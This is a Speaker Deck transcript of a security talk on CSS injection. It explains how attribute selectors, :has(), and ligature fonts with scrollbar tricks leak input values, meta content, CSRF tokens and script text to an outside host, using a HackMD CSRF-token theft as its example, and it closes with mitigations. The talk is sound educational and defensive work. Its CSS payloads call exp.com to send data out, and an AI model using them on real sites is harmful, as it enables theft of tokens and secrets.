$30 off During Our Annual Pro Sale. View Details »

Attacking web without JS - CSS injection

Huli
September 22, 2022
Programming
0
2.6k

Attacking web without JS - CSS injection

When speaking of web security in front-end, XSS is the first thing that comes to mind. But, even without JavaScript, the attacker can still use other attack vectors like HTML injection and CSS injection! This talk is an introduction to CSS injection.

Huli

September 22, 2022
Tweet

More Decks by Huli

See All by Huli
ModernWeb 2018 - 輕鬆應付複雜的非同步操作:RxJS + Redux Observable
aszx87410
0
76
Front-end Security that Front-end developers don't know
aszx87410
2
5.3k
你懂了 JavaScript,也不懂 JavaScript - MOPCON 2021
aszx87410
3
800
接觸資安才發現前端的水真深 - Modern Web 2021
aszx87410
0
1.6k
JSDC2020 - 用 API mocking 讓前端不再苦等待
aszx87410
0
1.1k

Other Decks in Programming

See All in Programming
Scala Left Fold Parallelisation - Three Approaches
philipschwarz
PRO
0
240
Git 和 DevOps - 在混亂的流星群開發流程中找到小確幸
eddie
1
860
Accelerating App Dev with Cloudflare Workers
chimame
0
190
実践PubSubマイクロサービス / Implementation Pub Sub microservice
nrslib
3
940
Introducing Kotlin Multiplatform in an existing mobile app - Workshop Edition | DevFest Berlin 23
prof18
0
190
Visually experience the beauty of mathematics with p5.js
clown0082
0
1.5k
From Spring Boot 2 to Spring Boot 3 with Java 21 and Jakarta EE
ivargrimstad
0
1.1k
Cloudflare Workers は楽しい!
codehex
7
2.1k
Hono v3 and v4
yusukebe
4
2.5k
從零開始打造可觀測性平台
blueswen
3
1.4k
弊社の開発体験の良いところは?メンバーに訊いてみた!
texmeijin
0
160
複数端末で Visual Regression Test を 実行する上での工夫と課題
morux2
0
490

Featured

See All Featured
Ruby is Unlike a Banana
tanoku
93
10k
Building Your Own Lightsaber
phodgson
97
5.4k
Building Effective Engineering Teams - LeadDev
addyosmani
22
1.2k
[RailsConf 2023] Rails as a piece of cake
palkan
16
3.1k
A Modern Web Designer's Workflow
chriscoyier
688
190k
Put a Button on it: Removing Barriers to Going Fast.
kastner
56
2.8k
ParisWeb 2013: Learning to Love: Crash Course in Emotional UX Design
dotmariusz
101
6.4k
Learning to Love Humans: Emotional Interface Design
aarron
265
39k
Become a Pro
speakerdeck
PRO
8
3.6k
Git: the NoSQL Database
bkeepers
PRO
420
62k
Code Review Best Practice
trishagee
53
14k
Mobile First: as difficult as doing things right
swwweet
214
8.3k

Transcript

  1. Attacking web without JS
    CSS Injection
    Huli from Cymetrics / OneInfinity @ CYBERSEC 2022

    View Slide

  2. About
    Huli

    • Security Researcher at Cymetrics /
    OneInfinity

    • CTF player at Water Paddler

    • https://blog.huli.tw/

    View Slide

  3. Front-end Security

    View Slide

  4. Front-end Security
    => XSS(Cross-Site Scripting)

    View Slide

  5. Front-end Security
    => XSS(Cross-Site Scripting)

    View Slide

  6. IE7 (15 years ago)

    View Slide

  7. CSS injection
    => Steal data via CSS

    View Slide

  8. CSS injection
    => Steal data via CSS
    How?

    View Slide

  9. input[value^="a"]{
    background: url("//exp.com?a");
    }

    View Slide

  10. CSS selectors
    input[value^="a"] // prefix
    input[value$="a"] // suffix
    input[value*="a"] // contains

    View Slide

  11. Steal input value





    View Slide

  12. Steal input value





    input[value^="a"]{
    background: url("//exp.com?a");
    }

    View Slide

  13. Steal input value





    input[value^="a"] + input {
    background: url("//exp.com?a");
    }

    View Slide

  14. Steal input value





    View Slide

  15. has: to the rescue





    form:has(input[value^="a"]) {
    background: url("//exp.com?a");
    }

    View Slide

  16. View Slide

  17. Steal meta content



    View Slide

  18. Steal meta content



    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  19. Steal meta content



    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  20. Steal meta content



    meta {
    display: block;
    }
    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  21. Steal meta content



    meta {
    display: block;
    }
    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  22. Steal meta content



    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  23. Steal meta content



    meta, head {
    display: block;
    }
    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  24. View Slide

  25. View Slide

  26. Steal HackMD CSRF token

    View Slide

  27. Steal HackMD CSRF token

    View Slide

  28. Steal HackMD CSRF token
    HackMD Server

    View Slide

  29. Steal HackMD CSRF token
    HackMD Server
    server?token=a

    View Slide

  30. Steal HackMD CSRF token
    HackMD Server
    server?token=a
    Update content and <br/>

    View Slide

  31. Steal HackMD CSRF token
    HackMD Server
    server?token=ab
    Update content and <br/>

    View Slide

  32. Demo

    View Slide

  33. Steal CSRF token != CSRF 😢

    View Slide

  34. Steal any content
    <br/>var secret = "abc123";<br/>
    Is it possible?

    View Slide

  35. ligature
    https://zh.m.wikipedia.org/zh-tw/File:Ligatures.svg

    View Slide

  36. ligature




    horiz-adv-x="10000" d="M1 0z"/>



    View Slide

  37. ligature + scroll bar
    script {
    width: 300px;
    display: block;
    font-family: "leak";
    white-space: nowrap;
    overflow-x: auto;
    }
    script::-webkit-scrollbar {
    background: blue;
    }
    script::-webkit-scrollbar:horizontal {
    background: url(https://exp.com?a);
    }

    View Slide

  38. ligature + scroll bar

    View Slide

  39. Mitigation
    • Sanitization

    • Content Security Policy

    • style-src

    • font-src

    • Check origin/referer header

    • Same-site cookie

    View Slide

  40. Reference
    1. https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf
    2. https://x-c3ll.github.io/posts/CSS-Injection-Primitives/
    3. https://book.hacktricks.xyz/pentesting-web/xs-search/css-injection
    4. https://research.securitum.com/stealing-data-in-great-style-how-to-use-css-to-attack-
    web-application/
    5. https://mksben.l0.cm/2021/11/css-exfiltration-svg-font.html
    6. https://github.com/masatokinugawa/css-exfiltration-svg-font/

    View Slide

  41. Q&A

    View Slide